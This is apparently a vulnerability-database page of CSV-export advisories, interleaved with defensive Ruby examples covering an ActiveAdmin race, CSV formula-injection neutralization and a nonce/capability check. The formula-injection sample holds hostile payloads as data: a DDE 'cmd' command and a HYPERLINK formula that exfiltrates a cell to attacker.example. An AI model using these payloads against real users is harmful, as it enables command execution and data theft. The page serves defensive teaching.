
319 matches found

Prion
added 2024/01/11 9:15 a.m. · 17 views

Cross site request forgery (csrf)

The My Sticky Bar plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.6.6. This is due to missing or incorrect nonce validation in mystickymenu-contact-leads.php. This makes it possible for unauthenticated attackers to trigger the export of a C...

CVSS 4.3 · AI score 6.7 · EPSS 0.00211
Exploits 0 · References 2 · Affected Software 1
Cvelist
added 2024/01/11 8:32 a.m. · 26 views

CVE-2023-7048 My Sticky Bar <= 2.6.6 - Cross-Site Request Forgery to Sensitive Information Exposure

The My Sticky Bar plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.6.6. This is due to missing or incorrect nonce validation in mystickymenu-contact-leads.php. This makes it possible for unauthenticated attackers to trigger the export of a C...

CVSS 3.1 · AI score 4.6 · EPSS 0.00211
Exploits 0 · References 2
WPVulnDB
added 2024/01/04 12:00 a.m. · 14 views

My Sticky Bar < 2.6.7 - CSV Export via CSRF to Sensitive Information Disclosure

Description The My Sticky Bar plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.6.6. This is due to missing or incorrect nonce validation in mystickymenu-contact-leads.php. This makes it possible for unauthenticated attackers to trigger the...

CVSS 4.3 · AI score 6.3 · EPSS 0.00211
Exploits 0 · References 1 · Affected Software 1
OSV
added 2023/12/28 11:15 p.m. · 5 views

CVE-2023-50448

In ActiveAdmin aka Active Admin before 2.12.0, a concurrency issue allows a malicious actor to access potentially private data that belongs to another user by making CSV export requests at certain specific times...

CVSS 6.5 · AI score 6.4
Exploits 0 · References 2
NVD
added 2023/12/28 11:15 p.m. · 11 views

CVE-2023-50448

In ActiveAdmin aka Active Admin before 2.12.0, a concurrency issue allows a malicious actor to access potentially private data that belongs to another user by making CSV export requests at certain specific times...

CVSS 6.5 · EPSS 0.00496
Exploits 0 · References 2
Prion
added 2023/12/28 11:15 p.m. · 12 views

Code injection

In ActiveAdmin aka Active Admin before 2.12.0, a concurrency issue allows a malicious actor to access potentially private data that belongs to another user by making CSV export requests at certain specific times...

CVSS 4.3 · AI score 7 · EPSS 0.00496
Exploits 0 · References 2 · Affected Software 1
CNNVD
added 2023/12/28 12:00 a.m. · 1 views

Active Admin security vulnerability

Active Admin is an open source Ruby on Rails framework used to create a backend for website management. A security vulnerability exists in versions prior to Active Admin 2.12.0 that originated from allowing an attacker to access another user's private data by initiating a CSV...

CVSS 6.5 · AI score 6.7 · EPSS 0.00496
Exploits 0 · References 3
Cvelist
added 2023/12/28 12:00 a.m. · 15 views

CVE-2023-50448

In ActiveAdmin aka Active Admin before 2.12.0, a concurrency issue allows a malicious actor to access potentially private data that belongs to another user by making CSV export requests at certain specific times...

AI score 6.6 · EPSS 0.00496
Exploits 0 · References 2
CVE
added 2023/12/28 12:00 a.m. · 57 views

CVE-2023-50448

Summary: CVE-2023-50448 affects ActiveAdmin (Ruby on Rails) before 2.12.0, where a concurrency issue in the CSV export path can let a user access data belonging to another user. The root cause is a shared, unsynchronized variable that holds the collection to be exported, allowing timing-based lea...

CVSS 6.5 · AI score 6.3 · EPSS 0.00496
Exploits 0 · References 2 · Affected Software 1
GitLab Advisory Database
added 2023/12/28 12:00 a.m. · 18 views

Potential CSV export data leak

Impact In ActiveAdmin versions prior to 2.12.0, a concurrency issue was found that could allow a malicious actor to be able to access potentially private data that belongs to another user. The bug affects the functionality to export data as CSV files, and was caused by a variable holding the...

CVSS 6.5 · AI score 6.9 · EPSS 0.00496
Exploits 0 · References 2 · Affected Software 1
Snyk
added 2023/12/16 11:22 p.m. · 3 views

Information Exposure

Overview Affected versions of this package are vulnerable to Information Exposure due to a concurrency issue that results in a shared variable not being properly synchronized. An attacker with access to the same ActiveAdmin application can obtain private data intended for another user by timing...

CVSS 6.8 · AI score 6.7 · EPSS 0.00496
Exploits 0 · References 2
OSV
added 2023/12/15 11:44 p.m. · 9 views

GHSA-356J-HG45-X525 Potential CSV export data leak

Impact In ActiveAdmin versions prior to 2.12.0, a concurrency issue was found that could allow a malicious actor to be able to access potentially private data that belongs to another user. The bug affects the functionality to export data as CSV files, and was caused by a variable holding the...

CVSS 8.4 · AI score 6.2 · EPSS 0.00496
Exploits 0 · References 5
Github Security Blog
added 2023/12/15 11:44 p.m. · 15 views

Potential CSV export data leak

Impact In ActiveAdmin versions prior to 2.12.0, a concurrency issue was found that could allow a malicious actor to be able to access potentially private data that belongs to another user. The bug affects the functionality to export data as CSV files, and was caused by a variable holding the...

CVSS 6.5 · AI score 6.7 · EPSS 0.00496
Exploits 0 · References 5 · Affected Software 1
RubySec
added 2023/12/15 12:00 a.m. · 15 views

Potential CSV export data leak

Impact In ActiveAdmin versions prior to 2.12.0, a concurrency issue was found that could allow a malicious actor to be able to access potentially private data that belongs to another user. The bug affects the functionality to export data as CSV files, and was caused by a variable holding the...

CVSS 6.5 · AI score 6.9 · EPSS 0.00496
Exploits 0 · References 1 · Affected Software 1
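The ActiveAdmin entries above (CVE-2023-50448, GHSA-356J-HG45-X525) all describe one root cause: the collection to be exported was kept in a variable shared between requests, so a request that paused between assigning its collection and rendering it could emit rows that belong to whichever request assigned last. The Ruby below is an added, simplified model written for this page, not ActiveAdmin's own code: `SharedStateBuilder`, `LocalStateBuilder`, `race` and the `ROWS_BY_USER` sample rows are all constructed here. It forces the losing interleaving deterministically with a Queue handshake instead of relying on timing.

```ruby
require "csv"

# Constructed sample data for this example (not ActiveAdmin's): the rows each
# user is allowed to export.
ROWS_BY_USER = {
  "alice" => [["1", "alice-only order"]],
  "bob"   => [["2", "bob-only order"]],
}.freeze

# Simplified model of the pre-2.12.0 pattern: one builder object is reused by
# every request and stashes the collection in an instance variable, which is
# shared mutable state once the server runs requests on several threads.
class SharedStateBuilder
  def initialize(columns)
    @columns = columns
  end

  # The block stands in for work done between loading the collection and
  # rendering it (view lookup, streaming setup); another request can run there.
  def build(collection)
    @collection = collection
    yield if block_given?
    render
  end

  private

  def render
    CSV.generate do |csv|
      csv << @columns
      @collection.each { |row| csv << row }
    end
  end
end

# Hardened model: the collection travels as an argument and a local variable,
# so there is nothing for a concurrent request to overwrite.
class LocalStateBuilder
  def initialize(columns)
    @columns = columns
  end

  def build(collection)
    yield if block_given?
    render(collection)
  end

  private

  def render(collection)
    CSV.generate do |csv|
      csv << @columns
      collection.each { |row| csv << row }
    end
  end
end

# Force the losing interleaving deterministically: request A (alice) assigns
# its collection and pauses; request B (bob) assigns and renders to completion;
# A resumes and renders. Returns the CSV that A, acting for alice, sends back.
def race(builder)
  a_assigned = Queue.new
  b_done     = Queue.new
  result_a   = nil

  request_a = Thread.new do
    result_a = builder.build(ROWS_BY_USER["alice"]) do
      a_assigned << :ok   # tell B that A's collection is in place
      b_done.pop          # wait until B has run to completion
    end
  end

  a_assigned.pop
  builder.build(ROWS_BY_USER["bob"])
  b_done << :ok
  request_a.join
  result_a
end

if __FILE__ == $PROGRAM_NAME
  puts "shared state, alice's export:\n#{race(SharedStateBuilder.new(%w[id note]))}"
  puts "local state, alice's export:\n#{race(LocalStateBuilder.new(%w[id note]))}"
end
```

With the shared-state builder, Alice's request returns Bob's row; the same interleaving against the local-state builder returns Alice's. The general rule for objects that Rails-style apps define once per resource (builders, serializers, presenters) is that per-request data must travel as arguments or per-request objects, never as instance variables on an object that outlives the request, because a threaded server such as Puma makes this interleaving reachable from ordinary traffic.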
Positive Technologies
added 2023/12/14 12:00 a.m. · 6 views

PT-2023-32697

Name of the Vulnerable Software and Affected Versions h2oai/h2o-3 affected versions not specified Description The issue allows unauthenticated users to overwrite any file accessible to the user who executes h2o.init, potentially resulting in a denial of service. Remote unauthenticated attackers c...

CVSS 9.3 · AI score 7.4 · EPSS 0.00715
Exploits 1 · References 9
Positive Technologies
added 2023/12/06 12:00 a.m. · 2 views

PT-2023-29974 · Prestashop · Orders (Csv

Name of the Vulnerable Software and Affected Versions: Orders CSV, Excel Export PRO module for PrestaShop versions prior to 5.2.0 Description: The issue allows a guest to download personal information without restriction due to a lack of permissions control. This can lead to a leak of personal...

CVSS 7.5 · AI score 7.4 · EPSS 0.0059
Exploits 0 · References 3
Positive Technologies
added 2023/11/17 12:00 a.m. · 3 views

PT-2023-30674 · Coreos · Corebos

Name of the Vulnerable Software and Affected Versions: Corebos versions 8.0 and below Description: The issue allows an attacker with low privileges to inject a malicious command into a table, which is then executed when an administrator exports the data to a CSV file and opens it, potentially...

CVSS 8 · AI score 7.8 · EPSS 0.01285
Exploits 1 · References 3
Tenable Nessus
added 2023/11/01 12:00 a.m. · 17 views

Puppet Enterprise < 2019.8.6 Unsanitized Input Vulnerability

Puppet Enterprise presented a security risk by not sanitizing user input when doing a CSV export. Note that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number. The descriptive text in this plugin...

CVSS 8.8 · AI score 8.4 · EPSS 0.01032
Exploits 0 · References 2
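The coreBOS and Puppet Enterprise entries above are both CSV (formula) injection: a value stored by a low-privileged user begins with `=`, `+`, `-` or `@`, survives the export unchanged, and is evaluated as a formula (DDE command, hyperlink, data exfiltration) when an administrator opens the file in a spreadsheet. The Ruby below is an added example for this page, not code from either project; `neutralize_cell`, `export_csv`, `FORMULA_TRIGGERS`, `NUMERIC` and the `SAMPLE_ROWS` payloads are constructed here. It applies the usual mitigation: prefix formula-triggering cells with a single quote, leave genuine numbers alone so negative amounts are not mangled, and force-quote every field so an embedded comma or line break cannot split a cell.

```ruby
require "csv"

# Leading characters that spreadsheets treat as the start of a formula. Tab
# and carriage return are included because some importers strip them and then
# evaluate what follows.
FORMULA_TRIGGERS = ["=", "+", "-", "@", "\t", "\r"].freeze

# Plain numbers (including negative ones) must export unchanged, otherwise the
# "-" rule would corrupt every negative amount in the file.
NUMERIC = /\A-?\d+(\.\d+)?\z/

# Neutralize one cell: a formula-triggering value gets a leading single quote,
# which spreadsheet applications interpret as "keep this as text".
def neutralize_cell(value)
  s = value.to_s
  return s if s.empty? || NUMERIC.match?(s) || !FORMULA_TRIGGERS.include?(s[0])
  "'" + s
end

# Export rows with every field quoted, so a cell containing a comma or a line
# break cannot break out into a new field or record. Embedded double quotes
# are doubled by the CSV library.
def export_csv(header, rows)
  CSV.generate(force_quotes: true) do |csv|
    csv << header
    rows.each { |row| csv << row.map { |cell| neutralize_cell(cell) } }
  end
end

# Constructed sample: a low-privileged user's "note" field carries a DDE
# command payload and formula variants of the kind the coreBOS entry describes.
SAMPLE_ROWS = [
  ["1", "ordinary note", "-12.50"],
  ["2", "=cmd|'/C calc'!A0", "3"],
  ["3", "@SUM(1+1)*cmd|'/C calc'!A0", "0"],
  ["4", "+HYPERLINK(\"http://attacker.example/?\"&A1,\"open\")", "7"],
  ["5", "\t=1+1", "1"],
].freeze

def sample_export
  export_csv(%w[id note amount], SAMPLE_ROWS)
end

puts sample_export if __FILE__ == $PROGRAM_NAME
```

The single-quote prefix is a display-side defence and the recipient still sees the payload text, so it is worth pairing with input validation at write time (coreBOS's table fields) and with a quick check on the export path that logs any cell it had to neutralize; that log line is a useful detection signal for an insider planting payloads.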
wpexploit
added 2023/10/16 12:00 a.m. · 163 views

WP Simple Table Manager Plugin <= 1.5.6 - Admin+ Stored Cross-Site Scripting

Description The plugin does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed, for example in a multisite setup. 1. Click Simple Table Manager then...

CVSS 4.8 · AI score 5.5 · EPSS 0.00405
Exploits 2 · References 1
ATTACKERKB
added 2023/10/12 11:15 p.m. · 4 views

CVE-2023-41261

An issue was discovered in /fcgi/scrutfcgi.fcgi in Plixer Scrutinizer before 19.3.1. The csvExportReport endpoint action generateCSV does not require authentication and allows an unauthenticated user to export a report and access the results...

CVSS 5.3 · AI score 6.1 · EPSS 0.00494
Exploits 1 · References 2
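The My Sticky Bar, PrestaShop Orders CSV and Plixer Scrutinizer entries share one failure: the CSV export action runs for whoever reaches the endpoint, with either the anti-CSRF nonce or the permission check missing. WordPress plugins are PHP, so the Ruby below is an added model of the check written for this page, not code from any of those projects: `nonce_for`, `verify_nonce`, `constant_time_equal?`, `export_leads_vulnerable`, `export_leads_hardened`, `SECRET` and the `CAPS` table are all constructed. The nonce mirrors the WordPress design (an HMAC over action, user and a 12-hour tick, accepted for the current and previous tick) so that a token minted for one action or user is useless for another.

```ruby
require "openssl"

# Constructed stand-ins for framework state: a server secret (WordPress derives
# its nonces from the site salts) and a user_id => capabilities table.
SECRET = "constructed-server-secret-do-not-reuse".freeze
CAPS   = { 42 => %w[manage_options], 7 => %w[read] }.freeze

NONCE_ACTION = "export_leads".freeze
TICK_SECONDS = 12 * 60 * 60   # nonce lifetime window, as WordPress uses

def current_tick
  Time.now.to_i / TICK_SECONDS
end

# A nonce bound to an action, a user and a time window: a token minted for
# another action, another user, or long ago does not verify.
def nonce_for(action, user_id, tick = current_tick)
  OpenSSL::HMAC.hexdigest("SHA256", SECRET, "#{tick}|#{action}|#{user_id}")[0, 20]
end

# Constant-time comparison so the check does not leak how many leading bytes
# of a guess were right.
def constant_time_equal?(a, b)
  return false unless a.bytesize == b.bytesize
  a.bytes.zip(b.bytes).reduce(0) { |acc, (x, y)| acc | (x ^ y) }.zero?
end

def verify_nonce(token, action, user_id)
  tick = current_tick
  [tick, tick - 1].any? do |t|
    constant_time_equal?(token.to_s, nonce_for(action, user_id, t))
  end
end

def build_leads_csv
  "email,name\nlead@example.com,Constructed Lead\n"   # constructed sample output
end

# Vulnerable shape: the handler dispatches on the action name alone, so a
# cross-site form post, or a plain unauthenticated request, triggers the export.
# Returns [status, body].
def export_leads_vulnerable(params, _user_id)
  return [400, ""] unless params["action"] == NONCE_ACTION
  [200, build_leads_csv]
end

# Hardened shape: authenticated user, required capability, then a nonce that
# was minted for this action and this user.
def export_leads_hardened(params, user_id)
  return [400, ""] unless params["action"] == NONCE_ACTION
  return [401, ""] if user_id.nil?
  return [403, ""] unless CAPS.fetch(user_id, []).include?("manage_options")
  return [403, ""] unless verify_nonce(params["nonce"], NONCE_ACTION, user_id)
  [200, build_leads_csv]
end

if __FILE__ == $PROGRAM_NAME
  good = { "action" => NONCE_ACTION, "nonce" => nonce_for(NONCE_ACTION, 42) }
  puts "vulnerable, no user:  #{export_leads_vulnerable({ 'action' => NONCE_ACTION }, nil)[0]}"
  puts "hardened, no user:    #{export_leads_hardened({ 'action' => NONCE_ACTION }, nil)[0]}"
  puts "hardened, admin+nonce: #{export_leads_hardened(good, 42)[0]}"
end
```

The two checks are deliberately separate: the capability test answers "may this user export leads at all", the nonce answers "did this user intend this particular request". A handler with only the nonce still hands the file to any logged-in user who can mint one, and a handler with only the capability check is still reachable through a forged cross-site request from an administrator's browser; the "incorrect nonce validation" wording in the advisory usually means the second case, where the token is read but never verified or is verified for the wrong action.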